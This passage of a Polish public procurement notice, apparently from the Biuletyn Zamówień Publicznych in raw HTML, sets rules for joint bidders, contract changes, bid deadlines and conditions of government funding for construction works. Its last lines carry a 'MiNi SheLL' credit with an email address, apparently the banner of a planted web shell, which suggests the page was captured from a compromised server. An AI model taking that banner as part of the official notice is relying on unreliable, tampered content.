reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Ustanowienie pełnomocnika musi być potwierdzone stosownym pełnomocnictwem lub innym dokumentem (np. umowa<br/>konsorcjum, umowa spółki cywilnej, uchwała wspólników spółki cywilnej) podpisanym przez każdego z Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia, z którego wynika umocowanie pełnomocnika do reprezentowania tych<br/>Wykonawców w prowadzonym postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie<br/>zamówienia publicznego.<br/>2) Ofertę składaną przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia podpisują wszyscy Wykonawcy<br/>lub ustanowiony pełnomocnik, który został umocowany do ich reprezentowania. W przypadku podpisania oferty przez<br/>pełnomocnika wraz z ofertą należy złożyć pełnomocnictwo lub inny dokument (np. umowa konsorcjum, umowa spółki<br/>cywilnej, uchwała wspólników spółki cywilnej), z którego wynika umocowanie do samodzielnej reprezentacji.<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>3) Zgodnie z art. 445 ust. 1 ustawy Pzp Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną<br/>odpowiedzialność za wykonanie umowy.<br/>4) Wypełniając formularz ofertowy w miejscu do podania danych Wykonawcy należy podać dane dotyczące wszystkich<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia, a nie tylko dane pełnomocnika.<br/>5) Wszelka korespondencja będzie prowadzona z ustanowionym pełnomocnikiem.<br/>6) Każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia (dotyczy również wspólników spółki cywilnej)<br/>musi złożyć odrębnie:<br/>a) oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu w zakresie wskazanym przez<br/>Zamawiającego sporządzone odpowiednio na/wg załącznika nr 3 do Specyfikacji Warunków Zamówienia dotyczącej<br/>prowadzonego postępowania.;<br/>W przypadku wspólników spółki cywilnej ww. oświadczenie każdego wspólnika musi zawierać dane przedsiębiorcy<br/>składającego oświadczenie (m.in. pełną nazwę, adres, NIP przedsiębiorcy), a nie dane spółki cywilnej.<br/>7) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (dotyczy również wspólników spółki cywilnej) muszą złożyć<br/>wraz z ofertą oświadczenie składane na podstawie art. 117 ust. 4 ustawy Pzp, z którego wynika, które usługi wykonają<br/>poszczególni Wykonawcy wspólnie ubiegający się o udzielenie zamówienia sporządzone odpowiednio na/wg załącznika nr<br/>5 do Specyfikacji Warunków Zamówienia dotyczącej prowadzonego postępowania. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Szczegółowy opis rodzaju i zakresu przewidywanych zmian umowy określonych przez Zamawiającego na podstawie art.<br/>455 ust. 1 pkt 1) ustawy Pzp oraz warunkach wprowadzenia zmian, które zostały określone w rozdziale XXXI Specyfikacji<br/>Warunków Zamówienia dotyczącej prowadzonego postępowania. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-08-14 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem platformy zakupowej pod adresem https://platformazakupowa.pl/pn/cuwkoszalin</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-08-14 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający na przedmiot zamówienia otrzymał Wstępną Promesę dofinansowania inwestycji z Rządowego Funduszu<br/>Polski Ład: Programu Inwestycji Strategicznych. Zgodnie z regulaminem Rządowego Funduszu Polski Ład: Programu<br/>Inwestycji Strategicznych Zamawiający może otrzymać Promesę po rozstrzygnięciu postępowania skutkującego wyborem<br/>Wykonawców na wykonanie przedmiotu zamówienia, z zastrzeżeniem, że Promesa wchodzi w życie po złożeniu przez<br/>Zamawiającego oświadczenia o zawarciu umów na realizację Inwestycji.<br/><br/>W związku z art. 310 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych, Zamawiający przewiduje możliwość<br/>unieważnienia postępowania, jeżeli środki publiczne z Rządowego Funduszu Polski Ład: Programu Inwestycji<br/>Strategicznych, które Zamawiający zamierza przeznaczyć na sfinansowanie zamówienia nie zostaną mu przyznane.

Creat By MiNi SheLL
Email: jattceo@gmail.com